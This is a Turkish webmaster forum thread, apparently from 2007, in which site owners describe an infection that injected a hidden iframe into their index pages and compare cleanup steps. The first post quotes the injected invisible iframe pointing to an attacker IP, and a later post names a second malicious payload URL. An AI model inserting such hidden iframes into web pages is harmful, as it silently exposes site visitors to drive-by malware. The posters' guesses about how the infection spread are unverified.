Siteme girdiğimde;
<iframe src=’http://81.95.149.26/logo/index.php’ width=’1′ height=’1′ style=’visibility: hidden;’></iframe>
şeklinde iframe içinde kod gördüm, kaspersky uyarı verdi doğal olarak, siteyi olduğu gibi bilgisayarıma indirdim tek tek dosyaları aramaya başladım kod sadece index.php dosyasındaymış, neyse temizledim geri gönderdim ftpye.
Ama 1 gün sonra aynı kod bu sefer sildim ve geri yolladım ftp şifresini değiştirdim.
O gecede aksilik 30 siteyi başka servera taşımıştım, almanyadaki windows serverımı kullanarak, olayı çözemedim.
Linux servera bulaşmaz, o zaman linux serverdaki sitelerime neden bulaştı cevabı basit bilgisayarda girdiğim tüm ftp şifrelerini otomatik alıyor belirli bir zamanda o kodu atıyor.
Yada ben ftpye dosyayı atarken giriyor bir şekilde.
Kendi bilgisayarıma format attım, tüm ftp şifrelerimi değiştirdim.
kod sadece index.htm, index.html, default.asp, index.asp, index.php dosyalarına bulaşıyor.
Body tagının yanına yada en alta kendini ekliyor.
Kendi bilgisayarımda hiç bir dosyada o iframe kodunu bulamadım.
virüs dosyayı ftpye atarken bulaşıyor.
Şimdi almanyadaki windows serverıma bulaştımı onu çözmeye çalışıyorum.
Bu virüs baya kişinin canını yakacak galiba 
İnşallah bulaşmamıştır.
Tarih
16.08.2007 bu seferde http://81.95.149.27/oth/get.php?opt=load virüsü var, webmasterlar dikkat kötü sitelere, özellikle toplistlere girmeyin ve sitelerinizi eklemeyin.
dostum haklısın çok lanet bir virüs hala uğrasıyoruzz
Sorunu şu yolla çözdüm.
1- Bilgisayarıma format.
2- Tek tek iframeleri temizledim.
3- Ftp şifrelerini değiştirdim.
Bu yolu izlemenizi tavsiye ederim, baya yorucu ama.
O şekilde bayağı uğraşacağına direk şu metodu dene bence!
http://www.isenturk.com/modules.php?name=Forums&file=viewtopic&p=424#424
Yazını okudum ama chmodluk bişey yok ftpye girdikten sonra ne yapabilirsin.
Şu anda hiçbir sorun yok.
Panama’daki ipyi gösteriyor nerden bulaşıyor acaba bu virüs?
Sanırım hosttaki mail klasörüne bulaşıyor. Ama ben bulamadım içinde. Bir deneme yapacağım klasörü sileceğim tamamen o zaman çözülürse problem orda. Ama beni düşündüren olay nasıl bulaştı ? Açık olrak hangi açığı kullanıyor ?
Bana da aynısı oldu dneyeceğim.